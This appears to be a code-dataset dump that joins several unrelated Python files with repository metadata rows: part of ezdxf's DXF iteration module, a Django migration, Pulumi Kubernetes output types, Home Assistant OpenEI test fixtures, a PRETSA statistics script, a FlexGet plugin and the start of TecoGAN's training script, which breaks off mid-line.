TABLES, BLOCKS and OBJECTS sections, which guarantees all necessary
dependencies are present in the new file.
Args:
name: filename, no special requirements
"""
doc = IterDXFWriter(name, self)
# Copy everything from start of source DXF until the first entity
# of the ENTITIES section to the new DXF.
location = self.structure.index[self.sections["ENTITIES"] + 1].location
self.file.seek(0)
data = self.file.read(location)
doc.write_data(data)
return doc
def copy_objects_section(self, f: BinaryIO) -> None:
start_index = self.sections["OBJECTS"]
try:
end_index = self.structure.get(0, "ENDSEC", start_index)
except ValueError:
raise DXFStructureError(f"ENDSEC of OBJECTS section not found.")
start_location = self.structure.index[start_index].location
end_location = self.structure.index[end_index + 1].location
count = end_location - start_location
self.file.seek(start_location)
data = self.file.read(count)
f.write(data)
def modelspace(self, types: Iterable[str] = None) -> Iterable[DXFGraphic]:
"""Returns an iterator for all supported DXF entities in the
modelspace. These entities are regular :class:`~ezdxf.entities.DXFGraphic`
objects but without a valid document assigned. It is **not**
possible to add these entities to other `ezdxf` documents.
It is only possible to recreate the objects by factory functions base
on attributes of the source entity.
For MESH, POLYMESH and POLYFACE it is possible to use the
:class:`~ezdxf.render.MeshTransformer` class to render (recreate) this
objects as new entities in another document.
Args:
types: DXF types like ``['LINE', '3DFACE']`` which should be
returned, ``None`` returns all supported types.
"""
linked_entity = entity_linker()
queued = None
requested_types = _requested_types(types)
for entity in self.load_entities(
self.sections["ENTITIES"] + 1, requested_types
):
if not linked_entity(entity) and entity.dxf.paperspace == 0:
# queue one entity for collecting linked entities:
# VERTEX, ATTRIB
if queued:
yield queued
queued = entity
if queued:
yield queued
def load_entities(
self, start: int, requested_types: Set[str]) -> Iterable[DXFGraphic]:
def to_str(data: bytes) -> str:
return data.decode(self.encoding, errors=self.errors).replace(
"\r\n", "\n"
)
index = start
entry = self.structure.index[index]
self.file.seek(entry.location)
while entry.value != "ENDSEC":
index += 1
next_entry = self.structure.index[index]
size = next_entry.location - entry.location
data = self.file.read(size)
if entry.value in requested_types:
xtags = ExtendedTags.from_text(to_str(data))
yield factory.load(xtags) # type: ignore
entry = next_entry
def close(self):
"""Safe closing source DXF file."""
self.file.close()
class IterDXFWriter:
def __init__(self, name: Filename, loader: IterDXF):
self.name = str(name)
self.file: BinaryIO = open(name, mode="wb")
self.text = StringIO()
self.entity_writer = TagWriter(self.text, loader.dxfversion)
self.loader = loader
def write_data(self, data: bytes):
self.file.write(data)
def write(self, entity: DXFGraphic):
"""Write a DXF entity from the source DXF file to the export file.
Don't write entities from different documents than the source DXF file,
dependencies and resources will not match, maybe it will work once, but
not in a reliable way for different DXF documents.
"""
# Not necessary to remove this dependencies by copying
# them into the same document frame
# ---------------------------------
# remove all possible dependencies
# entity.xdata = None
# entity.appdata = None
# entity.extension_dict = None
# entity.reactors = None
# reset text stream
self.text.seek(0)
self.text.truncate()
if entity.dxf.handle is None: # DXF R12 without handles
self.entity_writer.write_handles = False
entity.export_dxf(self.entity_writer)
if entity.dxftype() == "POLYLINE":
polyline = cast(Polyline, entity)
for vertex in polyline.vertices:
vertex.export_dxf(self.entity_writer)
polyline.seqend.export_dxf(self.entity_writer) # type: ignore
elif entity.dxftype() == "INSERT":
insert = cast(Insert, entity)
if insert.attribs_follow:
for attrib in insert.attribs:
attrib.export_dxf(self.entity_writer)
insert.seqend.export_dxf(self.entity_writer) # type: ignore
data = self.text.getvalue().encode(self.loader.encoding)
self.file.write(data)
def close(self):
"""Safe closing of exported DXF file. Copying of OBJECTS section
happens only at closing the file, without closing the new DXF file is
invalid.
"""
self.file.write(b" 0\r\nENDSEC\r\n") # for ENTITIES section
if self.loader.dxfversion > "AC1009":
self.loader.copy_objects_section(self.file)
self.file.write(b" 0\r\nEOF\r\n")
self.file.close()
def opendxf(filename: Filename, errors: str = "surrogateescape") -> IterDXF:
"""Open DXF file for iterating, be sure to open valid DXF files, no DXF
structure checks will be applied.
Use this function to split up big DXF files as shown in the example above.
Args:
filename: DXF filename of a seekable DXF file.
errors: specify decoding error handler
- "surrogateescape" to preserve possible binary data (default)
- "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
- "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
Raises:
DXFStructureError: invalid or incomplete DXF file
UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
"""
return IterDXF(filename, errors=errors)
def modelspace(
filename: Filename,
types: Iterable[str] = None,
errors: str = "surrogateescape",
) -> Iterable[DXFGraphic]:
"""Iterate over all modelspace entities as :class:`DXFGraphic` objects of
a seekable file.
Use this function to iterate "quick" over modelspace entities of a DXF file,
filtering DXF types may speed up things if many entity types will be skipped.
Args:
filename: filename of a seekable DXF file
types: DXF types like ``['LINE', '3DFACE']`` which should be returned,
``None`` returns all supported types.
errors: specify decoding error handler
- "surrogateescape" to preserve possible binary data (default)
- "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
- "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
Raises:
DXFStructureError: invalid or incomplete DXF file
UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
"""
info = dxf_file_info(str(filename))
prev_code: int = -1
prev_value: Any = ""
entities = False
requested_types = _requested_types(types)
with open(filename, mode="rt", encoding=info.encoding, errors=errors) as fp:
tagger = ascii_tags_loader(fp)
queued: Optional[DXFEntity] = None
tags: List[DXFTag] = []
linked_entity = entity_linker()
for tag in tag_compiler(tagger):
code = tag.code
value = tag.value
if entities:
if code == 0:
if len(tags) and tags[0].value in requested_types:
entity = factory.load(ExtendedTags(tags))
if (
not linked_entity(entity)
and entity.dxf.paperspace == 0
):
# queue one entity for collecting linked entities:
# VERTEX, ATTRIB
if queued:
yield queued # type: ignore
queued = entity
tags = [tag]
else:
tags.append(tag)
if code == 0 and value == "ENDSEC":
if queued:
yield queued # type: ignore
return
continue # if entities - nothing else matters
elif code == 2 and prev_code == 0 and prev_value == "SECTION":
entities = value == "ENTITIES"
prev_code = code
prev_value = value
def single_pass_modelspace(
stream: BinaryIO,
types: Iterable[str] = None,
errors: str = "surrogateescape",
) -> Iterable[DXFGraphic]:
"""Iterate over all modelspace entities as :class:`DXFGraphic` objects in
one single pass.
Use this function to 'quick' iterate over modelspace entities of a **not**
seekable binary DXF stream, filtering DXF types may speed up things if many
entity types will be skipped.
Args:
stream: (not seekable) binary DXF stream
types: DXF types like ``['LINE', '3DFACE']`` which should be returned,
``None`` returns all supported types.
errors: specify decoding error handler
- "surrogateescape" to preserve possible binary data (default)
- "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
- "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
Raises:
DXFStructureError: Invalid or incomplete DXF file
UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
"""
fetch_header_var: Optional[str] = None
encoding = "cp1252"
version = "AC1009"
prev_code: int = -1
prev_value: str = ""
entities = False
requested_types = _requested_types(types)
for code, value in binary_tagger(stream):
if code == 0 and value == b"ENDSEC":
break
elif code == 2 and prev_code == 0 and value != b"HEADER":
# (0, SECTION), (2, name)
# First section is not the HEADER section
entities = value == b"ENTITIES"
break
elif code == 9 and value == b"$DWGCODEPAGE":
fetch_header_var = "ENCODING"
elif code == 9 and value == b"$ACADVER":
fetch_header_var = "VERSION"
elif fetch_header_var == "ENCODING":
encoding = toencoding(value.decode())
fetch_header_var = None
elif fetch_header_var == "VERSION":
version = value.decode()
fetch_header_var = None
prev_code = code
if version >= "AC1021":
encoding = "utf-8"
queued: Optional[DXFGraphic] = None
tags: List[DXFTag] = []
linked_entity = entity_linker()
for tag in tag_compiler(binary_tagger(stream, encoding, errors)):
code = tag.code
value = tag.value
if entities:
if code == 0 and value == "ENDSEC":
if queued:
yield queued
return
if code == 0:
if len(tags) and tags[0].value in requested_types:
entity = cast(DXFGraphic, factory.load(ExtendedTags(tags)))
if not linked_entity(entity) and entity.dxf.paperspace == 0:
# queue one entity for collecting linked entities:
# VERTEX, ATTRIB
if queued:
yield queued
queued = entity
tags = [tag]
else:
tags.append(tag)
continue # if entities - nothing else matters
elif code == 2 and prev_code == 0 and prev_value == "SECTION":
entities = value == "ENTITIES"
prev_code = code
prev_value = value
def binary_tagger(
file: BinaryIO, encoding: str = None, errors: str = "surrogateescape"
) -> Iterator[DXFTag]:
while True:
try:
try:
code = int(file.readline())
except ValueError:
raise DXFStructureError(f"Invalid group code")
value = file.readline().rstrip(b"\r\n")
yield DXFTag(
code,
value.decode(encoding, errors=errors) if encoding else value,
)
except IOError:
return
def _requested_types(types: Optional[Iterable[str]]) -> Set[str]:
if types:
requested = SUPPORTED_TYPES.intersection(set(types))
if "POLYLINE" in requested:
requested.add("SEQEND")
requested.add("VERTEX")
if "INSERT" in requested:
requested.add("SEQEND")
requested.add("ATTRIB")
else:
requested = SUPPORTED_TYPES
return requested
| 35.106472
| 89
| 0.596991
|
4a0ea897851d786d50a88ae4ee826b7010129e9e
| 3,011
|
py
|
Python
|
server/migrations/0078_auto_20180723_0936.py
|
lfaraone/sal
|
d0dff90cebcbc87f18c2c6957264f21566d52000
|
[
"Apache-2.0"
] | 1
|
2019-11-01T20:54:47.000Z
|
2019-11-01T20:54:47.000Z
|
server/migrations/0078_auto_20180723_0936.py
|
grahamgilbert/sal
|
d247ec1ea8855e65e5855b0dd63eae93b40f86ca
|
[
"Apache-2.0"
] | null | null | null |
server/migrations/0078_auto_20180723_0936.py
|
grahamgilbert/sal
|
d247ec1ea8855e65e5855b0dd63eae93b40f86ca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-07-23 16:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0077_friendlynamecache'),
]
operations = [
migrations.AlterField(
model_name='apikey',
name='private_key',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='apikey',
name='public_key',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='condition',
name='condition_data',
field=models.TextField(),
),
migrations.AlterField(
model_name='condition',
name='condition_name',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='fact',
name='fact_name',
field=models.TextField(),
),
migrations.AlterField(
model_name='friendlynamecache',
name='serial_stub',
field=models.CharField(max_length=5),
),
migrations.AlterField(
model_name='historicalfact',
name='fact_name',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='historicalfact',
name='fact_recorded',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='installedupdate',
name='update_version',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='pendingappleupdate',
name='update_version',
field=models.CharField(blank=True, max_length=256, null=True),
),
migrations.AlterField(
model_name='pendingupdate',
name='update_version',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='pluginscriptrow',
name='pluginscript_data',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='pluginscriptrow',
name='pluginscript_data_string',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='pluginscriptrow',
name='pluginscript_name',
field=models.TextField(),
),
migrations.AlterField(
model_name='pluginscriptrow',
name='submission_and_script_name',
field=models.TextField(),
),
migrations.AlterField(
model_name='pluginscriptsubmission',
name='plugin',
field=models.CharField(max_length=255),
),
]
| 31.364583
| 74
| 0.562936
|
4a0ea911014c9ce3b689a6797efbb3b2dc8ede0c
| 6,434
|
py
|
Python
|
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/scheduling/v1/outputs.py
|
sunbing81/pulumi-kubernetes
|
8de6b379b00e2ab95b24bc176de8b329c670d7cd
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by pulumigen. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ... import meta as _meta
__all__ = [
'PriorityClass',
]
@pulumi.output_type
class PriorityClass(dict):
"""
PriorityClass defines mapping from a priority class name to the priority integer value. The value can be any valid integer.
"""
def __init__(__self__, *,
value: int,
api_version: Optional[str] = None,
description: Optional[str] = None,
global_default: Optional[bool] = None,
kind: Optional[str] = None,
metadata: Optional['_meta.v1.outputs.ObjectMeta'] = None,
preemption_policy: Optional[str] = None):
"""
PriorityClass defines mapping from a priority class name to the priority integer value. The value can be any valid integer.
:param int value: The value of this priority class. This is the actual priority that pods receive when they have the name of this class in their pod spec.
:param str api_version: APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
:param str description: description is an arbitrary string that usually provides guidelines on when this priority class should be used.
:param bool global_default: globalDefault specifies whether this PriorityClass should be considered as the default priority for pods that do not have any priority class. Only one PriorityClass can be marked as `globalDefault`. However, if more than one PriorityClasses exists with their `globalDefault` field set to true, the smallest value of such global default PriorityClasses will be used as the default priority.
:param str kind: Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param '_meta.v1.ObjectMetaArgs' metadata: Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
:param str preemption_policy: PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate.
"""
pulumi.set(__self__, "value", value)
if api_version is not None:
pulumi.set(__self__, "api_version", 'scheduling.k8s.io/v1')
if description is not None:
pulumi.set(__self__, "description", description)
if global_default is not None:
pulumi.set(__self__, "global_default", global_default)
if kind is not None:
pulumi.set(__self__, "kind", 'PriorityClass')
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if preemption_policy is not None:
pulumi.set(__self__, "preemption_policy", preemption_policy)
@property
@pulumi.getter
def value(self) -> int:
"""
The value of this priority class. This is the actual priority that pods receive when they have the name of this class in their pod spec.
"""
return pulumi.get(self, "value")
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
description is an arbitrary string that usually provides guidelines on when this priority class should be used.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="globalDefault")
def global_default(self) -> Optional[bool]:
"""
globalDefault specifies whether this PriorityClass should be considered as the default priority for pods that do not have any priority class. Only one PriorityClass can be marked as `globalDefault`. However, if more than one PriorityClasses exists with their `globalDefault` field set to true, the smallest value of such global default PriorityClasses will be used as the default priority.
"""
return pulumi.get(self, "global_default")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def metadata(self) -> Optional['_meta.v1.outputs.ObjectMeta']:
"""
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter(name="preemptionPolicy")
def preemption_policy(self) -> Optional[str]:
"""
PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate.
"""
return pulumi.get(self, "preemption_policy")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| 56.938053
| 425
| 0.708579
|
4a0ea9d9d5fe51b46df18ee9dab28f7cbf13f952
| 1,791
|
py
|
Python
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 7
|
2021-09-08T14:46:11.000Z
|
2021-11-14T18:14:09.000Z
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 44
|
2021-09-03T22:09:21.000Z
|
2021-12-15T17:21:25.000Z
|
tests/conftest.py
|
firstof9/ha-openei
|
ac01f6756b846591049d629249d11a0d1edfb867
|
[
"MIT"
] | 1
|
2021-09-04T13:15:51.000Z
|
2021-09-04T13:15:51.000Z
|
"""Test configurations."""
from unittest.mock import patch
import pytest
pytest_plugins = "pytest_homeassistant_custom_component"
@pytest.fixture(autouse=True)
def auto_enable_custom_integrations(enable_custom_integrations):
yield
@pytest.fixture(name="mock_api")
def mock_api():
"""Mock the library calls."""
with patch("custom_components.openei.openeihttp.Rates") as mock_api:
# mock_api = mock.Mock(spec=openeihttp.Rates)
mock_api.return_value.current_rate = 0.24477
mock_api.return_value.distributed_generation = "Net Metering"
mock_api.return_value.approval = True
mock_api.return_value.rate_name = 0.24477
mock_api.return_value.mincharge = (10, "$/month")
mock_api.return_value.lookup_plans = (
'"Fake Utility Co": [{"name": "Fake Plan Name", "label": "randomstring"}]'
)
yield mock_api
@pytest.fixture(name="mock_api_config")
def mock_api_config():
"""Mock the library calls."""
with patch("custom_components.openei.config_flow.openeihttp.Rates") as mock_api:
mock_return = mock_api.return_value
mock_return.lookup_plans.return_value = {
"Fake Utility Co": [{"name": "Fake Plan Name", "label": "randomstring"}]
}
yield mock_return
@pytest.fixture(name="mock_sensors")
def mock_get_sensors():
"""Mock of get sensors function."""
with patch("custom_components.openei.get_sensors", autospec=True) as mock_sensors:
mock_sensors.return_value = {
"current_rate": 0.24477,
"distributed_generation": "Net Metering",
"approval": True,
"rate_name": "Fake Test Rate",
"mincharge": 10,
"mincharge_uom": "$/month",
}
yield mock_sensors
| 31.421053
| 86
| 0.663875
|
4a0eab4e9b90c2dad613e8f934993478c7ef0615
| 80
|
py
|
Python
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 2
|
2015-10-19T14:56:00.000Z
|
2016-08-19T13:42:50.000Z
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 3
|
2016-03-02T09:18:47.000Z
|
2021-03-25T21:39:00.000Z
|
scotty/version.py
|
huandy/python-scotty
|
b8d1925db881adaf06ce3c532ab3a61835dce6a8
|
[
"Apache-2.0"
] | 5
|
2015-11-29T04:28:37.000Z
|
2017-07-18T08:51:59.000Z
|
__version_info__ = (0, 1, 7)
__version__ = '.'.join(map(str, __version_info__))
| 26.666667
| 50
| 0.7
|
4a0eac88f6a70ad48033a76571c9c1d79d021428
| 2,075
|
py
|
Python
|
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
calculateAnnotationsEventLog_pretsa.py
|
jkoessle/PRETSA
|
93435f1ab37a87a96487496c9facae51971bcfd1
|
[
"MIT"
] | null | null | null |
import sys
import pandas as pd
import csv
import os
import numpy as np
class excel_semicolon(csv.excel):
delimiter = ';'
dictPath = sys.argv[1]
writeFilePath = dictPath + "pretsa_statistics_annotations.csv"
with open(writeFilePath, 'w+') as writeFile:
caseIDColName = "Case ID"
datasets = ["Road_Traffic_Fine_Management_Process","CoSeLoG","Sepsis"]
fieldNamesWrite = ["Event Log","k","t","method","activity","Avg. Duration"]
writer = csv.DictWriter(writeFile, fieldnames=fieldNamesWrite, dialect=excel_semicolon)
writer.writeheader()
for dataset in datasets:
for k in range(1,9):
k = 2 ** k
tString = ["0.1","0.07500000000000001","0.05","0.024999999999999994"]
for t in range(0,4):
filePath = dictPath + dataset + "_duration_t" + tString[t] + "_k" + str(k) + "_pretsa.csv"
t = round(0.1 - (t*0.025), 3)
if os.path.isfile(filePath):
try:
eventLog = pd.read_csv(filePath, delimiter=";")
eventLog = eventLog.replace(-1.0,np.nan)
if not eventLog.empty:
data = eventLog.groupby('Activity').Duration.agg("mean")
for row in data.iteritems():
(key, value) = row
line = dict()
line["Event Log"] = dataset
line["k"] = k
line["t"] = str(t)
line["method"] = "pretsa"
line["activity"] = key
line["Avg. Duration"] = value
writer.writerow(line)
except pd.errors.EmptyDataError:
print("Dataset " + dataset + " with k = " + str(k) + "and t = " + str(t) + " is empty")
else:
print(filePath + " does not exist")
| 46.111111
| 112
| 0.470843
|
4a0eaccda3694abdb3af0309f302d9ba07b676fb
| 741
|
py
|
Python
|
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | 1
|
2018-05-02T21:14:50.000Z
|
2018-05-02T21:14:50.000Z
|
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | null | null | null |
flexget/plugins/generic/log_start.py
|
sillygreen89/Flexget
|
60f24ab0dda7b94c87ba43451921c50c3cef391f
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
import logging
import os
from argparse import SUPPRESS
from flexget import options
from flexget.event import event
log = logging.getLogger('log_start')
@event('manager.startup')
def log_on_start(manager):
if manager.options.log_start:
log.info('FlexGet started (PID: %s)' % os.getpid())
@event('manager.shutdown')
def log_on_shutdown(manager):
if manager.options.log_start:
log.info('FlexGet stopped (PID: %s)' % os.getpid())
@event('options.register')
def register_options():
options.get_parser().add_argument('--log-start', action='store_true', help=SUPPRESS)
| 25.551724
| 88
| 0.74224
|
4a0ead224f0868d84bfae8f883f9a5e18b8a6ebd
| 22,072
|
py
|
Python
|
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
main_good.py
|
ginsongsong/TecoGAN
|
9f3b4b76d5098ce07c2594eac8979c6536c50ea9
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os, math, time, collections, numpy as np
''' TF_CPP_MIN_LOG_LEVEL
0 = all messages are logged (default behavior)
1 = INFO messages are not printed
2 = INFO and WARNING messages are not printed
3 = INFO, WARNING, and ERROR messages are not printed
Disable Logs for now '''
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from tensorflow.python.util import deprecation
deprecation._PRINT_DEPRECATION_WARNINGS = False
import random as rn
#CV and scipy
import cv2 as cv
import scipy as signal
# fix all randomness, except for multi-treading or GPU process
os.environ['PYTHONHASHSEED'] = '0'
np.random.seed(42)
rn.seed(12345)
tf.set_random_seed(1234)
import tensorflow.contrib.slim as slim
import sys, shutil, subprocess
from lib.ops import *
from lib.dataloader import inference_data_loader, frvsr_gpu_data_loader
from lib.frvsr import generator_F, fnet
from lib.Teco import FRVSR, TecoGAN
Flags = tf.app.flags
Flags.DEFINE_integer('rand_seed', 1 , 'random seed' )
# Directories
Flags.DEFINE_string('input_dir_LR', None, 'The directory of the input resolution input data, for inference mode')
Flags.DEFINE_integer('input_dir_len', -1, 'length of the input for inference mode, -1 means all')
Flags.DEFINE_string('input_dir_HR', None, 'The directory of the input resolution input data, for inference mode')
Flags.DEFINE_string('mode', 'inference', 'train, or inference')
Flags.DEFINE_string('output_dir', None, 'The output directory of the checkpoint')
Flags.DEFINE_string('output_pre', '', 'The name of the subfolder for the images')
Flags.DEFINE_string('output_name', 'output', 'The pre name of the outputs')
Flags.DEFINE_string('output_ext', 'jpg', 'The format of the output when evaluating')
Flags.DEFINE_string('summary_dir', None, 'The dirctory to output the summary')
# Models
Flags.DEFINE_string('checkpoint', None, 'If provided, the weight will be restored from the provided checkpoint')
Flags.DEFINE_integer('num_resblock', 16, 'How many residual blocks are there in the generator')
# Models for training
Flags.DEFINE_boolean('pre_trained_model', False, 'If True, the weight of generator will be loaded as an initial point'
'If False, continue the training')
Flags.DEFINE_string('vgg_ckpt', None, 'path to checkpoint file for the vgg19')
# Machine resources
Flags.DEFINE_string('cudaID', '0', 'CUDA devices')
Flags.DEFINE_integer('queue_thread', 6, 'The threads of the queue (More threads can speedup the training process.')
Flags.DEFINE_integer('name_video_queue_capacity', 512, 'The capacity of the filename queue (suggest large to ensure'
'enough random shuffle.')
Flags.DEFINE_integer('video_queue_capacity', 256, 'The capacity of the video queue (suggest large to ensure'
'enough random shuffle')
Flags.DEFINE_integer('video_queue_batch', 2, 'shuffle_batch queue capacity')
# Training details
# The data preparing operation
Flags.DEFINE_integer('RNN_N', 10, 'The number of the rnn recurrent length')
Flags.DEFINE_integer('batch_size', 4, 'Batch size of the input batch')
Flags.DEFINE_boolean('flip', True, 'Whether random flip data augmentation is applied')
Flags.DEFINE_boolean('random_crop', True, 'Whether perform the random crop')
Flags.DEFINE_boolean('movingFirstFrame', True, 'Whether use constant moving first frame randomly.')
Flags.DEFINE_integer('crop_size', 32, 'The crop size of the training image')
# Training data settings
Flags.DEFINE_string('input_video_dir', '', 'The directory of the video input data, for training')
Flags.DEFINE_string('input_video_pre', 'scene', 'The pre of the directory of the video input data')
Flags.DEFINE_integer('str_dir', 1000, 'The starting index of the video directory')
Flags.DEFINE_integer('end_dir', 2000, 'The ending index of the video directory')
Flags.DEFINE_integer('end_dir_val', 2050, 'The ending index for validation of the video directory')
Flags.DEFINE_integer('max_frm', 119, 'The ending index of the video directory')
# The loss parameters
Flags.DEFINE_float('vgg_scaling', -0.002, 'The scaling factor for the VGG perceptual loss, disable with negative value')
Flags.DEFINE_float('warp_scaling', 1.0, 'The scaling factor for the warp')
Flags.DEFINE_boolean('pingpang', False, 'use bi-directional recurrent or not')
Flags.DEFINE_float('pp_scaling', 1.0, 'factor of pingpang term, only works when pingpang is True')
# Training parameters
Flags.DEFINE_float('EPS', 1e-12, 'The eps added to prevent nan')
Flags.DEFINE_float('learning_rate', 0.0001, 'The learning rate for the network')
Flags.DEFINE_integer('decay_step', 500000, 'The steps needed to decay the learning rate')
Flags.DEFINE_float('decay_rate', 0.5, 'The decay rate of each decay step')
Flags.DEFINE_boolean('stair', False, 'Whether perform staircase decay. True => decay in discrete interval.')
Flags.DEFINE_float('beta', 0.9, 'The beta1 parameter for the Adam optimizer')
Flags.DEFINE_float('adameps', 1e-8, 'The eps parameter for the Adam optimizer')
Flags.DEFINE_integer('max_epoch', None, 'The max epoch for the training')
Flags.DEFINE_integer('max_iter', 1000000, 'The max iteration of the training')
Flags.DEFINE_integer('display_freq', 20, 'The diplay frequency of the training process')
Flags.DEFINE_integer('summary_freq', 100, 'The frequency of writing summary')
Flags.DEFINE_integer('save_freq', 10000, 'The frequency of saving images')
# Dst parameters
Flags.DEFINE_float('ratio', 0.01, 'The ratio between content loss and adversarial loss')
Flags.DEFINE_boolean('Dt_mergeDs', True, 'Whether only use a merged Discriminator.')
Flags.DEFINE_float('Dt_ratio_0', 1.0, 'The starting ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dt_ratio_add', 0.0, 'The increasing ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dt_ratio_max', 1.0, 'The max ratio for the temporal adversarial loss')
Flags.DEFINE_float('Dbalance', 0.4, 'An adaptive balancing for Discriminators')
Flags.DEFINE_float('crop_dt', 0.75, 'factor of dt crop') # dt input size = crop_size*crop_dt
Flags.DEFINE_boolean('D_LAYERLOSS', True, 'Whether use layer loss from D')
FLAGS = Flags.FLAGS
# Set CUDA devices correctly if you use multiple gpu system
os.environ["CUDA_VISIBLE_DEVICES"]=FLAGS.cudaID
# Fix randomness
my_seed = FLAGS.rand_seed
rn.seed(my_seed)
np.random.seed(my_seed)
tf.set_random_seed(my_seed)
# Check the output_dir is given
if FLAGS.output_dir is None:
raise ValueError('The output directory is needed')
# Check the output directory to save the checkpoint
if not os.path.exists(FLAGS.output_dir):
os.mkdir(FLAGS.output_dir)
# Check the summary directory to save the event
if not os.path.exists(FLAGS.summary_dir):
os.mkdir(FLAGS.summary_dir)
# custom Logger to write Log to file
class Logger(object):
def __init__(self):
self.terminal = sys.stdout
self.log = open(FLAGS.summary_dir + "logfile.txt", "a")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
self.log.flush()
sys.stdout = Logger()
def printVariable(scope, key = tf.GraphKeys.MODEL_VARIABLES):
print("Scope %s:" % scope)
variables_names = [ [v.name, v.get_shape().as_list()] for v in tf.get_collection(key, scope=scope)]
total_sz = 0
for k in variables_names:
print ("Variable: " + k[0])
print ("Shape: " + str(k[1]))
total_sz += np.prod(k[1])
print("total size: %d" %total_sz)
def preexec(): # Don't forward signals.
os.setpgrp()
def testWhileTrain(FLAGS, testno = 0):
'''
this function is called during training, Hard-Coded!!
to try the "inference" mode when a new model is saved.
The code has to be updated from machine to machine...
depending on python, and your training settings
'''
desstr = os.path.join(FLAGS.output_dir, 'train/') # saving in the ./train/ directory
cmd1 = ["python3", "main.py", # never tested with python2...
